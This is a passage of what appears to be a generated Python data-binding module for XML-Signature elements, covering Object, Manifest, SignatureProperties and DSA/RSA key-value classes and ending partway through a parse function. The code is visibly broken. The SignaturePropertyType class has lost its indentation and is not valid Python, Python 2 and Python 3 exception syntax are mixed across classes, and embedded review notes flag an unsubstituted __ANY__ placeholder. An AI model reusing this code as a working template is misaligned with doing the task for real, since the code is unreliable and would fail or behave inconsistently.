            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
    def buildAttributes(self, node, attrs, already_processed):
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Parse one child element into the matching member."""
        if nodeName_ == 'SPKISexp':
            sval_ = child_.text
            if sval_ is not None:
                try:
                    bval_ = base64.b64decode(sval_)
                except (TypeError, ValueError), exp:
                    raise_parse_error(child_, 'requires base64 encoded string: %s' % exp)
                bval_ = self.gds_validate_base64(bval_, node, 'SPKISexp')
            else:
                # Empty element: member stays None.
                bval_ = None
            self.SPKISexp = bval_
        else:
            # Wildcard (xs:any) content from other namespaces.
            obj_ = self.gds_build_any(child_, 'SPKIDataType')
            if obj_ is not None:
                self.set_anytypeobjs_(obj_)
# end class SPKIDataType
class ObjectType(GeneratedsSuper):
    """Generated binding for the XML-Signature ds:Object element.

    ds:Object is a mixed-content container: interleaved text and arbitrary
    child elements are kept in order in ``content_`` as MixedContainer
    items, while ``valueOf_`` holds the concatenated text.

    Attributes: MimeType, Id, Encoding (all plain XML attributes).
    """
    subclass = None
    superclass = None
    def __init__(self, MimeType=None, Id=None, Encoding=None, anytypeobjs_=None, valueOf_=None, mixedclass_=None, content_=None):
        self.MimeType = _cast(None, MimeType)
        self.Id = _cast(None, Id)
        self.Encoding = _cast(None, Encoding)
        self.anytypeobjs_ = anytypeobjs_
        self.valueOf_ = valueOf_
        if mixedclass_ is None:
            self.mixedclass_ = MixedContainer
        else:
            self.mixedclass_ = mixedclass_
        if content_ is None:
            self.content_ = []
        else:
            self.content_ = content_
        # NOTE(review): generator emits this duplicate assignment; harmless.
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        # Construct via a registered subclass when one has been installed.
        if ObjectType.subclass:
            return ObjectType.subclass(*args_, **kwargs_)
        else:
            return ObjectType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_anytypeobjs_(self): return self.anytypeobjs_
    def set_anytypeobjs_(self, anytypeobjs_): self.anytypeobjs_ = anytypeobjs_
    def get_MimeType(self): return self.MimeType
    def set_MimeType(self, MimeType): self.MimeType = MimeType
    def get_Id(self): return self.Id
    def set_Id(self, Id): self.Id = Id
    def get_Encoding(self): return self.Encoding
    def set_Encoding(self, Encoding): self.Encoding = Encoding
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def hasContent_(self):
        # True when there is wildcard content or any text value.
        if (
            self.anytypeobjs_ is not None or
            self.valueOf_
            ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='ds:', name_='ObjectType', namespacedef_='', pretty_print=True):
        """Serialize this element (attributes plus mixed content) as XML."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='ObjectType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='ObjectType'):
        if self.MimeType is not None and 'MimeType' not in already_processed:
            already_processed.add('MimeType')
            outfile.write(' MimeType=%s' % (self.gds_format_string(quote_attrib(self.MimeType).encode(ExternalEncoding), input_name='MimeType'), ))
        if self.Id is not None and 'Id' not in already_processed:
            already_processed.add('Id')
            outfile.write(' Id=%s' % (self.gds_format_string(quote_attrib(self.Id).encode(ExternalEncoding), input_name='Id'), ))
        if self.Encoding is not None and 'Encoding' not in already_processed:
            already_processed.add('Encoding')
            outfile.write(' Encoding=%s' % (self.gds_format_string(quote_attrib(self.Encoding).encode(ExternalEncoding), input_name='Encoding'), ))
    def exportChildren(self, outfile, level, namespace_='ds:', name_='ObjectType', fromsubclass_=False, pretty_print=True):
        # Mixed content: replay the recorded text/element items in order.
        if not fromsubclass_:
            for item_ in self.content_:
                item_.export(outfile, level, item_.name, namespace_, pretty_print=pretty_print)
    def exportLiteral(self, outfile, level, name_='ObjectType'):
        """Write this instance as Python constructor-literal text."""
        level += 1
        already_processed = set()
        self.exportLiteralAttributes(outfile, level, already_processed, name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)
        showIndent(outfile, level)
        outfile.write('valueOf_ = """%s""",\n' % (self.valueOf_,))
    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        if self.MimeType is not None and 'MimeType' not in already_processed:
            already_processed.add('MimeType')
            showIndent(outfile, level)
            outfile.write('MimeType="%s",\n' % (self.MimeType,))
        if self.Id is not None and 'Id' not in already_processed:
            already_processed.add('Id')
            showIndent(outfile, level)
            outfile.write('Id="%s",\n' % (self.Id,))
        if self.Encoding is not None and 'Encoding' not in already_processed:
            already_processed.add('Encoding')
            showIndent(outfile, level)
            outfile.write('Encoding="%s",\n' % (self.Encoding,))
    def exportLiteralChildren(self, outfile, level, name_):
        showIndent(outfile, level)
        outfile.write('content_ = [\n')
        for item_ in self.content_:
            item_.exportLiteral(outfile, level, name_)
        showIndent(outfile, level)
        outfile.write('],\n')
        pass
    def build(self, node):
        """Populate attributes, text, and mixed content from *node*."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        if node.text is not None:
            # Record leading text as a mixed-content text item.
            obj_ = self.mixedclass_(MixedContainer.CategoryText,
                MixedContainer.TypeNone, '', node.text)
            self.content_.append(obj_)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
    def buildAttributes(self, node, attrs, already_processed):
        value = find_attr_value_('MimeType', node)
        if value is not None and 'MimeType' not in already_processed:
            already_processed.add('MimeType')
            self.MimeType = value
        value = find_attr_value_('Id', node)
        if value is not None and 'Id' not in already_processed:
            already_processed.add('Id')
            self.Id = value
        value = find_attr_value_('Encoding', node)
        if value is not None and 'Encoding' not in already_processed:
            already_processed.add('Encoding')
            self.Encoding = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # NOTE(review): '' never matches a real tag, so the __ANY__ branch
        # appears unreachable as generated — confirm against generateDS.
        if nodeName_ == '':
            obj_ = __ANY__.factory()
            obj_.build(child_)
            obj_ = self.mixedclass_(MixedContainer.CategoryComplex,
                MixedContainer.TypeNone, '', obj_)
            self.content_.append(obj_)
            if hasattr(self, 'add_'):
                self.add_(obj_.value)
            elif hasattr(self, 'set_'):
                self.set_(obj_.value)
        if not fromsubclass_ and child_.tail is not None:
            # Preserve text that follows the child element.
            obj_ = self.mixedclass_(MixedContainer.CategoryText,
                MixedContainer.TypeNone, '', child_.tail)
            self.content_.append(obj_)
# end class ObjectType
class ManifestType(GeneratedsSuper):
    """Generated binding for the XML-Signature ds:Manifest element.

    Members:
      Id        -- optional XML attribute.
      Reference -- list of ReferenceType children.
    """
    subclass = None
    superclass = None
    def __init__(self, Id=None, Reference=None):
        self.Id = _cast(None, Id)
        if Reference is None:
            self.Reference = []
        else:
            self.Reference = Reference
    def factory(*args_, **kwargs_):
        # Construct via a registered subclass when one has been installed.
        if ManifestType.subclass:
            return ManifestType.subclass(*args_, **kwargs_)
        else:
            return ManifestType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_Reference(self): return self.Reference
    def set_Reference(self, Reference): self.Reference = Reference
    def add_Reference(self, value): self.Reference.append(value)
    def insert_Reference(self, index, value): self.Reference[index] = value
    def get_Id(self): return self.Id
    def set_Id(self, Id): self.Id = Id
    def hasContent_(self):
        # True when at least one Reference child exists.
        if (
            self.Reference
            ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='ds:', name_='ManifestType', namespacedef_='', pretty_print=True):
        """Serialize this element (and its children) as XML to *outfile*."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='ManifestType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='ManifestType'):
        if self.Id is not None and 'Id' not in already_processed:
            already_processed.add('Id')
            outfile.write(' Id=%s' % (self.gds_format_string(quote_attrib(self.Id).encode(ExternalEncoding), input_name='Id'), ))
    def exportChildren(self, outfile, level, namespace_='ds:', name_='ManifestType', fromsubclass_=False, pretty_print=True):
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        for Reference_ in self.Reference:
            Reference_.export(outfile, level, namespace_, name_='Reference', pretty_print=pretty_print)
    def exportLiteral(self, outfile, level, name_='ManifestType'):
        """Write this instance as Python constructor-literal text."""
        level += 1
        already_processed = set()
        self.exportLiteralAttributes(outfile, level, already_processed, name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)
    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        if self.Id is not None and 'Id' not in already_processed:
            already_processed.add('Id')
            showIndent(outfile, level)
            outfile.write('Id="%s",\n' % (self.Id,))
    def exportLiteralChildren(self, outfile, level, name_):
        showIndent(outfile, level)
        outfile.write('Reference=[\n')
        level += 1
        for Reference_ in self.Reference:
            showIndent(outfile, level)
            outfile.write('model_.Reference(\n')
            Reference_.exportLiteral(outfile, level)
            showIndent(outfile, level)
            outfile.write('),\n')
        level -= 1
        showIndent(outfile, level)
        outfile.write('],\n')
    def build(self, node):
        """Populate this instance from an ElementTree/lxml element *node*."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
    def buildAttributes(self, node, attrs, already_processed):
        value = find_attr_value_('Id', node)
        if value is not None and 'Id' not in already_processed:
            already_processed.add('Id')
            self.Id = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Parse one child element; only Reference children are recognized."""
        if nodeName_ == 'Reference':
            obj_ = ReferenceType.factory()
            obj_.build(child_)
            self.Reference.append(obj_)
# end class ManifestType
class SignaturePropertiesType(GeneratedsSuper):
    """Generated binding for the XML-Signature ds:SignatureProperties element.

    Members:
      Id                -- optional XML attribute.
      SignatureProperty -- list of SignaturePropertyType children.
    """
    subclass = None
    superclass = None
    def __init__(self, Id=None, SignatureProperty=None):
        self.Id = _cast(None, Id)
        if SignatureProperty is None:
            self.SignatureProperty = []
        else:
            self.SignatureProperty = SignatureProperty
    def factory(*args_, **kwargs_):
        # Construct via a registered subclass when one has been installed.
        if SignaturePropertiesType.subclass:
            return SignaturePropertiesType.subclass(*args_, **kwargs_)
        else:
            return SignaturePropertiesType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_SignatureProperty(self): return self.SignatureProperty
    def set_SignatureProperty(self, SignatureProperty): self.SignatureProperty = SignatureProperty
    def add_SignatureProperty(self, value): self.SignatureProperty.append(value)
    def insert_SignatureProperty(self, index, value): self.SignatureProperty[index] = value
    def get_Id(self): return self.Id
    def set_Id(self, Id): self.Id = Id
    def hasContent_(self):
        # True when at least one SignatureProperty child exists.
        if (
            self.SignatureProperty
            ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='ds:', name_='SignaturePropertiesType', namespacedef_='', pretty_print=True):
        """Serialize this element (and its children) as XML to *outfile*."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='SignaturePropertiesType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='SignaturePropertiesType'):
        if self.Id is not None and 'Id' not in already_processed:
            already_processed.add('Id')
            outfile.write(' Id=%s' % (self.gds_format_string(quote_attrib(self.Id).encode(ExternalEncoding), input_name='Id'), ))
    def exportChildren(self, outfile, level, namespace_='ds:', name_='SignaturePropertiesType', fromsubclass_=False, pretty_print=True):
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        for SignatureProperty_ in self.SignatureProperty:
            SignatureProperty_.export(outfile, level, namespace_, name_='SignatureProperty', pretty_print=pretty_print)
    def exportLiteral(self, outfile, level, name_='SignaturePropertiesType'):
        """Write this instance as Python constructor-literal text."""
        level += 1
        already_processed = set()
        self.exportLiteralAttributes(outfile, level, already_processed, name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)
    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        if self.Id is not None and 'Id' not in already_processed:
            already_processed.add('Id')
            showIndent(outfile, level)
            outfile.write('Id="%s",\n' % (self.Id,))
    def exportLiteralChildren(self, outfile, level, name_):
        showIndent(outfile, level)
        outfile.write('SignatureProperty=[\n')
        level += 1
        for SignatureProperty_ in self.SignatureProperty:
            showIndent(outfile, level)
            outfile.write('model_.SignatureProperty(\n')
            SignatureProperty_.exportLiteral(outfile, level)
            showIndent(outfile, level)
            outfile.write('),\n')
        level -= 1
        showIndent(outfile, level)
        outfile.write('],\n')
    def build(self, node):
        """Populate this instance from an ElementTree/lxml element *node*."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
    def buildAttributes(self, node, attrs, already_processed):
        value = find_attr_value_('Id', node)
        if value is not None and 'Id' not in already_processed:
            already_processed.add('Id')
            self.Id = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Parse one child; only SignatureProperty children are recognized."""
        if nodeName_ == 'SignatureProperty':
            obj_ = SignaturePropertyType.factory()
            obj_.build(child_)
            self.SignatureProperty.append(obj_)
# end class SignaturePropertiesType
class SignaturePropertyType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Target=None, Id=None, anytypeobjs_=None, valueOf_=None, mixedclass_=None, content_=None):
self.Target = _cast(None, Target)
self.Id = _cast(None, Id)
self.anytypeobjs_ = anytypeobjs_
self.valueOf_ = valueOf_
if mixedclass_ is None:
self.mixedclass_ = MixedContainer
else:
self.mixedclass_ = mixedclass_
if content_ is None:
self.content_ = []
else:
self.content_ = content_
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if SignaturePropertyType.subclass:
return SignaturePropertyType.subclass(*args_, **kwargs_)
else:
return SignaturePropertyType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_anytypeobjs_(self): return self.anytypeobjs_
def set_anytypeobjs_(self, anytypeobjs_): self.anytypeobjs_ = anytypeobjs_
def get_Target(self): return self.Target
def set_Target(self, Target): self.Target = Target
def get_Id(self): return self.Id
def set_Id(self, Id): self.Id = Id
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.anytypeobjs_ is not None or
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='ds:', name_='SignaturePropertyType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='SignaturePropertyType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='SignaturePropertyType'):
if self.Target is not None and 'Target' not in already_processed:
already_processed.add('Target')
outfile.write(' Target=%s' % (self.gds_format_string(quote_attrib(self.Target).encode(ExternalEncoding), input_name='Target'), ))
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
outfile.write(' Id=%s' % (self.gds_format_string(quote_attrib(self.Id).encode(ExternalEncoding), input_name='Id'), ))
def exportChildren(self, outfile, level, namespace_='ds:', name_='SignaturePropertyType', fromsubclass_=False, pretty_print=True):
if not fromsubclass_:
for item_ in self.content_:
item_.export(outfile, level, item_.name, namespace_, pretty_print=pretty_print)
def exportLiteral(self, outfile, level, name_='SignaturePropertyType'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
showIndent(outfile, level)
outfile.write('valueOf_ = """%s""",\n' % (self.valueOf_,))
    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        """Emit the Target and Id attributes as Python keyword-argument source."""
        if self.Target is not None and 'Target' not in already_processed:
            already_processed.add('Target')
            showIndent(outfile, level)
            outfile.write('Target="%s",\n' % (self.Target,))
        if self.Id is not None and 'Id' not in already_processed:
            already_processed.add('Id')
            showIndent(outfile, level)
            outfile.write('Id="%s",\n' % (self.Id,))
def exportLiteralChildren(self, outfile, level, name_):
showIndent(outfile, level)
outfile.write('content_ = [\n')
for item_ in self.content_:
item_.exportLiteral(outfile, level, name_)
showIndent(outfile, level)
outfile.write('],\n')
pass
    def build(self, node):
        """Populate this object (attributes, mixed text, children) from *node*."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        if node.text is not None:
            # Leading text becomes the first item of the mixed-content list.
            obj_ = self.mixedclass_(MixedContainer.CategoryText,
                MixedContainer.TypeNone, '', node.text)
            self.content_.append(obj_)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Target', node)
if value is not None and 'Target' not in already_processed:
already_processed.add('Target')
self.Target = value
value = find_attr_value_('Id', node)
if value is not None and 'Id' not in already_processed:
already_processed.add('Id')
self.Id = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Attach a parsed child element (and its trailing text) to content_."""
        if nodeName_ == '':
            # NOTE(review): __ANY__ looks like an unsubstituted generateDS
            # template placeholder; this branch would raise NameError if an
            # unnamed child were ever reached -- confirm against the
            # generator configuration.
            obj_ = __ANY__.factory()
            obj_.build(child_)
            obj_ = self.mixedclass_(MixedContainer.CategoryComplex,
                MixedContainer.TypeNone, '', obj_)
            self.content_.append(obj_)
            if hasattr(self, 'add_'):
                self.add_(obj_.value)
            elif hasattr(self, 'set_'):
                self.set_(obj_.value)
        # Text that follows the child element is kept as a mixed-content item.
        if not fromsubclass_ and child_.tail is not None:
            obj_ = self.mixedclass_(MixedContainer.CategoryText,
                MixedContainer.TypeNone, '', child_.tail)
            self.content_.append(obj_)
# end class SignaturePropertyType
class DSAKeyValueType(GeneratedsSuper):
    """DSA key value: P, Q, G, Y, J, Seed and PgenCounter child elements.

    Each member holds a decoded base64Binary (CryptoBinary) value, or None
    when the corresponding element is absent.
    """
    # Element names in schema order; drives the serialization helpers below.
    _member_names = ('P', 'Q', 'G', 'Y', 'J', 'Seed', 'PgenCounter')
    subclass = None
    superclass = None
    def __init__(self, P=None, Q=None, G=None, Y=None, J=None, Seed=None, PgenCounter=None):
        self.P = P
        self.Q = Q
        self.G = G
        self.Y = Y
        self.J = J
        self.Seed = Seed
        self.PgenCounter = PgenCounter
    def factory(*args_, **kwargs_):
        if DSAKeyValueType.subclass:
            return DSAKeyValueType.subclass(*args_, **kwargs_)
        else:
            return DSAKeyValueType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_P(self): return self.P
    def set_P(self, P): self.P = P
    def get_Q(self): return self.Q
    def set_Q(self, Q): self.Q = Q
    def get_G(self): return self.G
    def set_G(self, G): self.G = G
    def get_Y(self): return self.Y
    def set_Y(self, Y): self.Y = Y
    def get_J(self): return self.J
    def set_J(self, J): self.J = J
    def get_Seed(self): return self.Seed
    def set_Seed(self, Seed): self.Seed = Seed
    def get_PgenCounter(self): return self.PgenCounter
    def set_PgenCounter(self, PgenCounter): self.PgenCounter = PgenCounter
    def validate_CryptoBinary(self, value):
        # Validate type CryptoBinary, a restriction on base64Binary.
        pass
    def hasContent_(self):
        """True when at least one DSA member element is present."""
        return any(getattr(self, name) is not None for name in self._member_names)
    def export(self, outfile, level, namespace_='ds:', name_='DSAKeyValueType', namespacedef_='', pretty_print=True):
        """Write this object as an XML element to *outfile*."""
        eol_ = '\n' if pretty_print else ''
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='DSAKeyValueType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='DSAKeyValueType'):
        # This type has no XML attributes.
        pass
    def exportChildren(self, outfile, level, namespace_='ds:', name_='DSAKeyValueType', fromsubclass_=False, pretty_print=True):
        """Write each present member as a base64-encoded child element."""
        eol_ = '\n' if pretty_print else ''
        for member in self._member_names:
            value = getattr(self, member)
            if value is not None:
                showIndent(outfile, level, pretty_print)
                outfile.write('<%s%s>%s</%s%s>%s' % (
                    namespace_, member,
                    self.gds_format_base64(value, input_name=member),
                    namespace_, member, eol_))
    def exportLiteral(self, outfile, level, name_='DSAKeyValueType'):
        """Serialize this object as Python literal (constructor) source."""
        level += 1
        already_processed = set()
        self.exportLiteralAttributes(outfile, level, already_processed, name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)
    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        # This type has no XML attributes.
        pass
    def exportLiteralChildren(self, outfile, level, name_):
        """Emit each present member as Python keyword-argument source."""
        for member in self._member_names:
            value = getattr(self, member)
            if value is not None:
                showIndent(outfile, level)
                outfile.write('%s=model_.base64Binary(\n' % member)
                value.exportLiteral(outfile, level, name_=member)
                showIndent(outfile, level)
                outfile.write('),\n')
    def build(self, node):
        """Populate this object from an ElementTree/lxml *node*."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
    def buildAttributes(self, node, attrs, already_processed):
        # This type has no XML attributes.
        pass
    def _decode_base64_child(self, child_, node, member):
        """Return *child_*'s text decoded from base64, or None when empty.

        Reports a parse error (via raise_parse_error) on invalid base64.
        """
        sval_ = child_.text
        if sval_ is None:
            return None
        try:
            bval_ = base64.b64decode(sval_)
        except (TypeError, ValueError) as exp:  # 'as' spelling works on Py2.6+ and Py3
            raise_parse_error(child_, 'requires base64 encoded string: %s' % exp)
        return self.gds_validate_base64(bval_, node, member)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Decode a recognized member element; unknown elements are ignored."""
        if nodeName_ in self._member_names:
            value = self._decode_base64_child(child_, node, nodeName_)
            setattr(self, nodeName_, value)
            self.validate_CryptoBinary(value)  # validate type CryptoBinary
# end class DSAKeyValueType
class RSAKeyValueType(GeneratedsSuper):
    """RSA key value: Modulus and Exponent child elements.

    Each member holds a decoded base64Binary (CryptoBinary) value, or None
    when the corresponding element is absent.
    """
    # Element names in schema order; drives the serialization helpers below.
    _member_names = ('Modulus', 'Exponent')
    subclass = None
    superclass = None
    def __init__(self, Modulus=None, Exponent=None):
        self.Modulus = Modulus
        self.Exponent = Exponent
    def factory(*args_, **kwargs_):
        if RSAKeyValueType.subclass:
            return RSAKeyValueType.subclass(*args_, **kwargs_)
        else:
            return RSAKeyValueType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_Modulus(self): return self.Modulus
    def set_Modulus(self, Modulus): self.Modulus = Modulus
    def get_Exponent(self): return self.Exponent
    def set_Exponent(self, Exponent): self.Exponent = Exponent
    def validate_CryptoBinary(self, value):
        # Validate type CryptoBinary, a restriction on base64Binary.
        pass
    def hasContent_(self):
        """True when at least one RSA member element is present."""
        return any(getattr(self, name) is not None for name in self._member_names)
    def export(self, outfile, level, namespace_='ds:', name_='RSAKeyValueType', namespacedef_='', pretty_print=True):
        """Write this object as an XML element to *outfile*."""
        eol_ = '\n' if pretty_print else ''
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='RSAKeyValueType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='RSAKeyValueType'):
        # This type has no XML attributes.
        pass
    def exportChildren(self, outfile, level, namespace_='ds:', name_='RSAKeyValueType', fromsubclass_=False, pretty_print=True):
        """Write each present member as a base64-encoded child element."""
        eol_ = '\n' if pretty_print else ''
        for member in self._member_names:
            value = getattr(self, member)
            if value is not None:
                showIndent(outfile, level, pretty_print)
                outfile.write('<%s%s>%s</%s%s>%s' % (
                    namespace_, member,
                    self.gds_format_base64(value, input_name=member),
                    namespace_, member, eol_))
    def exportLiteral(self, outfile, level, name_='RSAKeyValueType'):
        """Serialize this object as Python literal (constructor) source."""
        level += 1
        already_processed = set()
        self.exportLiteralAttributes(outfile, level, already_processed, name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)
    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        # This type has no XML attributes.
        pass
    def exportLiteralChildren(self, outfile, level, name_):
        """Emit each present member as Python keyword-argument source."""
        for member in self._member_names:
            value = getattr(self, member)
            if value is not None:
                showIndent(outfile, level)
                outfile.write('%s=model_.base64Binary(\n' % member)
                value.exportLiteral(outfile, level, name_=member)
                showIndent(outfile, level)
                outfile.write('),\n')
    def build(self, node):
        """Populate this object from an ElementTree/lxml *node*."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
    def buildAttributes(self, node, attrs, already_processed):
        # This type has no XML attributes.
        pass
    def _decode_base64_child(self, child_, node, member):
        """Return *child_*'s text decoded from base64, or None when empty.

        Reports a parse error (via raise_parse_error) on invalid base64.
        """
        sval_ = child_.text
        if sval_ is None:
            return None
        try:
            bval_ = base64.b64decode(sval_)
        except (TypeError, ValueError) as exp:  # 'as' spelling works on Py2.6+ and Py3
            raise_parse_error(child_, 'requires base64 encoded string: %s' % exp)
        return self.gds_validate_base64(bval_, node, member)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Decode a recognized member element; unknown elements are ignored."""
        if nodeName_ in self._member_names:
            value = self._decode_base64_child(child_, node, nodeName_)
            setattr(self, nodeName_, value)
            self.validate_CryptoBinary(value)  # validate type CryptoBinary
# end class RSAKeyValueType
# Maps XML element tag names to their generated classes; used by
# get_root_tag() to pick a root class for an arbitrary document.
GDSClassesMapping = {
    'PGPData': PGPDataType,
    'Transform': TransformType,
    'X509IssuerSerial': X509IssuerSerialType,
    'SignatureMethod': SignatureMethodType,
    'SPKIData': SPKIDataType,
    'SignatureProperty': SignaturePropertyType,
    'Object': ObjectType,
    'X509Data': X509DataType,
    'DigestMethod': DigestMethodType,
    'KeyValue': KeyValueType,
    'CanonicalizationMethod': CanonicalizationMethodType,
    'SignatureProperties': SignaturePropertiesType,
    'KeyInfo': KeyInfoType,
    'Manifest': ManifestType,
    'RSAKeyValue': RSAKeyValueType,
    'Signature': SignatureType,
    'RetrievalMethod': RetrievalMethodType,
    'DSAKeyValue': DSAKeyValueType,
    'Reference': ReferenceType,
    'Transforms': TransformsType,
    'SignedInfo': SignedInfoType,
    'SignatureValue': SignatureValueType,
}
USAGE_TEXT = """
Usage: python <Parser>.py [ -s ] <in_xml_file>
"""


def usage():
    """Print command-line help and exit with a non-zero status."""
    # print(...) with a single argument behaves identically on Python 2
    # and 3; the previous 'print USAGE_TEXT' was Python 2-only syntax.
    print(USAGE_TEXT)
    sys.exit(1)
def get_root_tag(node):
    """Return (tag, mapped class) for *node*; the class is None if unknown."""
    tag = Tag_pattern_.match(node.tag).groups()[-1]
    root_class = GDSClassesMapping.get(tag)
    if root_class is None:
        # Fall back to a module-level class of the same name, if any.
        root_class = globals().get(tag)
    return tag, root_class
def parse(inFileName, silence=False):
    """Parse an XML file into its generated object tree.

    Unless *silence* is true, the re-serialized XML is echoed to stdout.
    Returns the root object.
    """
    doc = parsexml_(inFileName)
    rootNode = doc.getroot()
